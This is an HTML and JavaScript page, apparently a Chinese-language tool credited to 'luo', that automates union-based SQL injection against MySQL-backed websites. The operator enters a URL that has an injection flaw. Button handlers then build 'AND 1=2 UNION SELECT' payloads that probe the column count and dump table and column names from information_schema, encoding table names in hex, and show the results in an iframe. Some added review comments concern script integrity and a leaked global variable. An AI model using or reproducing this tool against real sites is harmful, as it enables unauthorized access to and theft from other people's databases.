<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Mysql版菊花残</title>
    <!-- NOTE(review): all three assets are fetched from third-party CDNs over plain http
         and carry no integrity attribute, so anyone on the network path can substitute
         the scripts that run in this page. Serve them over https and pin each with an
         SRI hash (integrity + crossorigin), or host copies alongside this file. -->
    <link rel="stylesheet" href="http://cdn.amazeui.org/amazeui/2.7.0/css/amazeui.min.css">
    <script src="http://libs.baidu.com/jquery/1.11.3/jquery.min.js"></script>
    <script src="http://cdn.amazeui.org/amazeui/2.7.0/js/amazeui.js"></script>
    <script>
        $(function () {


            // Comma-separated SELECT expressions accumulated across probe clicks
            // (one entry per non-refresh click after the first); emptied by the reset button.
            var field = '';
            // Column count currently being probed, starting at 1; advanced by every
            // non-refresh probe click and set back to 1 by the reset button.
            var iterator = 1;

            /**
             * Hex-encode a string: each UTF-16 code unit of `s` becomes its lowercase
             * hexadecimal digits, left-padded to at least two. Non-string input is
             * coerced with string concatenation first.
             * Ported from locutus.io's PHP bin2hex (Kevin van Zonneveld, Onno Marsman,
             * Linuxworld, ntoniazzi).
             *   bin2hex('Kev')                    -> '4b6576'
             *   bin2hex(String.fromCharCode(0x00)) -> '00'
             * NOTE(review): code units above 0xFF produce three or four digits, so the
             * result is a byte-wise encoding only for Latin-1 text.
             */
            var jsbin2hex = function bin2hex(s) {
                var text = '' + s;
                var digits = [];
                var idx;
                for (idx = 0; idx < text.length; idx++) {
                    var unit = text.charCodeAt(idx).toString(16);
                    digits.push(unit.length < 2 ? '0' + unit : unit);
                }
                return digits.join('');
            };

            /**
             * Return the address currently typed into the #url text box.
             */
            var url = function () {
                var $address = $('#url');
                return $address.val();
            };

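            /**
             * Display `url` next to the "当前注入URL" link and point that link at it.
             * Uses .text() instead of .html(): the value originates from a text box,
             * so any markup characters in it must be shown literally rather than
             * parsed into the page.
             */
            var injectionUrl = function (url) {
                $('#injection-url').text(url);
                $('#injection-href').attr('href', url);
            };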


            // Shared click handler for the probe buttons (.field-test, .table-test,
            // .table-field) and their ".refresh" variants. Builds the probe URL from the
            // #url value plus a UNION SELECT clause, loads it into the #view iframe and
            // shows it through injectionUrl(). `field` and `iterator` are the shared
            // state declared above; only non-refresh clicks advance them.
            $('.field-test, .table-test, .table-field, .refresh').on('click', function () {
                var str = url() + ' AND 1 =2 UNION SELECT ';

                var export_filed = '';   // expression appended to `field` (sic: misspelling of export_field)
                var condition = '';      // FROM ... tail appended after the column list

                if ($(this).hasClass('field-test')) {// Column test: probes with incrementing numbers, for use by the later steps.
                    str += '1';
                    export_filed = iterator;
                    condition = "";
                } else if ($(this).hasClass('table-test')) {// Enumerate table names from the database
                    str += export_filed = 'group_concat(a.table_name)';

                    var limit = $('#table-limit').val();
                    condition = ' FROM ( SELECT table_name FROM information_schema.tables LIMIT ' + limit + ', 100 ) AS a'

                } else if ($(this).hasClass('table-field')) {// Enumerate the columns of one table
                    str += export_filed = 'group_concat(a.column_name)';

                    // `limit` is re-declared with var; harmless under ES5 hoisting (single binding).
                    var limit = $('#field-limit').val();
                    // The table name is hex-encoded and echoed into #demo-name for the operator to see.
                    var table_name = jsbin2hex($('#table-name').val());
                    $('#demo-name').val(table_name);
                    condition = ' FROM (SELECT column_name FROM information_schema.columns WHERE table_name = 0x' + table_name + ' LIMIT ' + limit + ', 100 ) AS a ';
                }

                // From the second column on, append the new expression (unless refreshing)
                // and emit the accumulated column list.
                if (iterator > 1) {
                    if (!$(this).hasClass('refresh')) {
                        field += ',' + export_filed;
                    }
                    str += field;
                }
                str += condition;

                $('#view').attr('src', str);
                injectionUrl(str);
                if (!$(this).hasClass('refresh')) {
                    // Render "1,2,...,iterator" as the current column-count guess.
                    var number = '';
                    // NOTE(review): `i` is never declared in this function, so it leaks as a global.
                    for (i = 1; i <= iterator; i++) {
                        number += number == '' ? i : ',' + i;
                    }
                    $('#injection-num').html(number);   // digits and commas only, so .html() is safe here
                    iterator++;
                }
            });

            /**
             * Reset the probe state: drop the accumulated column list, restart the
             * column counter at 1, clear the guess display and show the bare #url value.
             */
            $('.refield-test').on('click', function () {
                iterator = 1;
                field = '';
                $('#injection-num').empty();
                injectionUrl(url());
            });
        })
    </script>
</head>
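<body style="background: #f8f8f8;">
<!-- Operator UI. Action controls are <button type="button"> (never submit the form);
     the inline script in <head> binds behaviour by class (.field-test, .table-test,
     .table-field, .refresh, .refield-test) and reads/writes the inputs and spans by id. -->
<form class="am-form">
    <fieldset>
        <legend>Mysql版菊花残 <span class="am-text-sm">——By luo</span></legend>

        <div class="am-form-group">
            <input id="url" type="text" placeholder="存在注入的网址" aria-label="存在注入的网址">

            <p class="am-text-middle">

            </p>
        </div>
        <div class="am-form-group">
            <button class="am-btn am-btn-success am-btn-xs refield-test" type="button">重置测试</button>
        </div>

        <div class="am-form-group">
            <button class="am-btn am-btn-primary am-btn-xs field-test" type="button">字段测试</button>
            <button class="am-btn am-btn-secondary am-btn-xs field-test refresh" type="button">更新数据</button>
        </div>

        <div class="am-form-group">
            <span id="table-limit-label">起止行:</span>
            <input class="am-inline am-input-sm" id="table-limit" type="text" value="0" placeholder="爆表起止行" aria-labelledby="table-limit-label" style="width: 50px;">
            <button class="am-btn am-btn-danger am-btn-xs table-test" type="button">开始爆表</button>
            <button class="am-btn am-btn-secondary am-btn-xs table-test refresh" type="button">更新数据</button>
        </div>

        <div class="am-form-group">
            <span id="table-name-label">表名:</span>
            <input class="am-inline am-input-sm" id="table-name" type="text" value="" placeholder="要爆破的表名称" aria-labelledby="table-name-label" style="width: 100px;">
            <input class="am-inline am-input-sm" id="demo-name" type="text" readonly value="" placeholder="字符串转16进制结果" aria-label="字符串转16进制结果" style="width: 100px;">
            <span id="field-limit-label">字段起止行:</span>
            <input class="am-inline am-input-sm" id="field-limit" type="text" value="0" placeholder="爆表起止行" aria-labelledby="field-limit-label" style="width: 50px;">
            <button class="am-btn am-btn-warning am-btn-xs table-field" type="button">开始爆表字段</button>

            <button class="am-btn am-btn-secondary am-btn-xs table-field refresh" type="button">更新数据</button>
        </div>


        <div class="am-form-group">
            <p>对应字段数字猜想：<span id="injection-num"></span></p>

            <!-- rel="noopener": the page opened in the new tab gets no window.opener back into this tool. -->
            <p><a id="injection-href" href="" target="_blank" rel="noopener">当前注入URL</a> ：<span id="injection-url"></span></p>
        </div>
    </fieldset>
</form>
<hr class="am-divider am-divider-dotted am-margin-bottom-0" data-am-widget="divider">
<!-- Result view; the script sets src to the current URL on every probe click. -->
<iframe id="view" src="about:blank" width="100%" height="500" title="当前注入URL"></iframe>
</body>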
</html>